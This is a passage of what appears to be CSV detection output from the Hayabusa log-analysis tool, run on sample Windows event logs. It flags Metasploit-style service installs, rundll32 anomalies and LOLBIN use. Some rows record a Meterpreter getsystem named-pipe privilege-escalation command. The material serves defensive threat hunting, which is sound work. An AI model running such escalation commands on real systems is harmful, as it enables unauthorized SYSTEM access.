19:55:49.765 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:50.703 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:50.703 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:51.578 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:51.578 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:51.989 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x71c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:52.176 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x7b8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:52.208 
+00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:52.208 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:52.364 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:52.801 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:53.255 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0xbc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:57.149 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xa5c | User: IEUser | LID: 0x1ceaf",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:57.542 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe 
C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xa7c | User: IEUser | LID: 0x1ceaf,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:57.542 +00:00,IE10Win7,4688,medium,Exec | Evas,False Sysinternals Suite Tools,,rules/sigma/process_creation_builtin/proc_creation_win_false_sysinternalsuite.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:55:59.915 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb1c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:56:00.621 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:56:00.621 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:56:02.589 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:56:34.967 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdac | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:56:34.999 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdd0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:58:48.497 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xce4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:58:48.512 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{A4B07E49-6567-4FB8-8D39-01920E3B2357} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd14 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:58:53.028 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:58:53.028 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:59:33.224 +00:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: IixaZHzxvTaopUGI | Path: 
%SYSTEMROOT%\ijQzlbXC.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 19:59:33.224 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: IixaZHzxvTaopUGI | Path: %SYSTEMROOT%\ijQzlbXC.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 19:59:33.224 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: IixaZHzxvTaopUGI | Path: %SYSTEMROOT%\ijQzlbXC.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 19:59:33.255 +00:00,IE10Win7,4688,high,LatMov | Exec,Rundll32 Without Parameters,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:59:33.255 +00:00,IE10Win7,4688,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation_builtin/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 19:59:33.255 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:00:43.879 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfc0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:00:43.910 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible 
LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x674 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:00:43.941 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:03:18.175 +00:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: yagfag | Path: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:03:18.175 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: yagfag | Path: cmd.exe /c echo yagfag > \\.\pipe\yagfag,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:03:18.175 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: yagfag | Path: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:03:18.175 +00:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Path: C:\Windows\System32\cmd.exe | PID: 0x57c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_MeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:03:18.175 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,Cmd Line: cmd.exe /c echo yagfag > \\.\pipe\yagfag | Path: C:\Windows\System32\cmd.exe | PID: 0x57c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:03:18.175 +00:00,IE10Win7,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:03:51.191 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:04:19.379 +00:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: XCKcRAHmHLAkajXO | Path: %SYSTEMROOT%\kAtEspLd.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:04:19.379 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: XCKcRAHmHLAkajXO | Path: %SYSTEMROOT%\kAtEspLd.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:04:19.379 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: XCKcRAHmHLAkajXO | Path: %SYSTEMROOT%\kAtEspLd.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:04:19.394 +00:00,IE10Win7,4688,high,LatMov | Exec,Rundll32 Without Parameters,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:04:19.394 +00:00,IE10Win7,4688,high,,Application Executed Non-Executable 
Extension,,rules/sigma/process_creation_builtin/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:04:19.394 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:08:53.832 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x274 | User: IEUser | LID: 0x1d069",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:08:53.832 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:08:59.785 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:10:06.597 +00:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: mHPhVsrnnbYuDOWj | Path: %SYSTEMROOT%\AFDvMJdc.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:10:06.597 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: mHPhVsrnnbYuDOWj | Path: %SYSTEMROOT%\AFDvMJdc.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:10:06.597 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: 
mHPhVsrnnbYuDOWj | Path: %SYSTEMROOT%\AFDvMJdc.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:10:06.629 +00:00,IE10Win7,4688,high,LatMov | Exec,Rundll32 Without Parameters,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:10:06.629 +00:00,IE10Win7,4688,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation_builtin/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:10:06.629 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:11:24.391 +00:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: VdhURnHArteGncWS | Path: %SYSTEMROOT%\dQGFdDtG.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:11:24.391 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: VdhURnHArteGncWS | Path: %SYSTEMROOT%\dQGFdDtG.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:11:24.391 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: VdhURnHArteGncWS | Path: %SYSTEMROOT%\dQGFdDtG.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:11:24.407 +00:00,IE10Win7,4688,high,LatMov | Exec,Rundll32 Without 
Parameters,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:11:24.407 +00:00,IE10Win7,4688,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation_builtin/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:11:24.407 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:11:24.907 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:11:24.907 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:12:53.344 +00:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: GWRhKCtKcmQarQUS | Path: %SYSTEMROOT%\frlCVwVW.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:12:53.344 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: GWRhKCtKcmQarQUS | Path: %SYSTEMROOT%\frlCVwVW.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:12:53.344 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: GWRhKCtKcmQarQUS | Path: %SYSTEMROOT%\frlCVwVW.exe | Account: LocalSystem | Start Type: demand 
start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:12:53.376 +00:00,IE10Win7,4688,high,LatMov | Exec,Rundll32 Without Parameters,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:12:53.376 +00:00,IE10Win7,4688,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation_builtin/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:12:53.376 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:14:12.922 +00:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: riddDteHwMfqxVOk | Path: %SYSTEMROOT%\GbzflpZs.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:14:12.922 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: riddDteHwMfqxVOk | Path: %SYSTEMROOT%\GbzflpZs.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:14:12.922 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: riddDteHwMfqxVOk | Path: %SYSTEMROOT%\GbzflpZs.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:14:12.954 +00:00,IE10Win7,4688,high,LatMov | Exec,Rundll32 Without Parameters,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 
+2016-08-18 20:14:12.954 +00:00,IE10Win7,4688,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation_builtin/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:14:12.954 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:16:40.574 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc94 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:16:40.574 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x754 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:16:40.605 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xad4 | User: IEUser | LID: 0x1ceaf",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:22:36.074 +00:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: JDFZBLLIkXqjccos | Path: 
%SYSTEMROOT%\zqvbnLTK.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:22:36.074 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: JDFZBLLIkXqjccos | Path: %SYSTEMROOT%\zqvbnLTK.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:22:36.074 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: JDFZBLLIkXqjccos | Path: %SYSTEMROOT%\zqvbnLTK.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:22:36.105 +00:00,IE10Win7,4688,high,LatMov | Exec,Rundll32 Without Parameters,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:22:36.105 +00:00,IE10Win7,4688,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation_builtin/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:22:36.105 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:24:48.043 +00:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: tLVOxEmULrqimOQr | Path: %SYSTEMROOT%\tnKMiZjQ.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:24:48.043 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: tLVOxEmULrqimOQr | Path: 
%SYSTEMROOT%\tnKMiZjQ.exe,rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:24:48.043 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: tLVOxEmULrqimOQr | Path: %SYSTEMROOT%\tnKMiZjQ.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 20:24:48.074 +00:00,IE10Win7,4688,high,LatMov | Exec,Rundll32 Without Parameters,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_without_parameters.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:24:48.074 +00:00,IE10Win7,4688,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation_builtin/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:24:48.074 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 20:40:21.230 +00:00,IE10Win7,7045,high,Persis,Suspicious 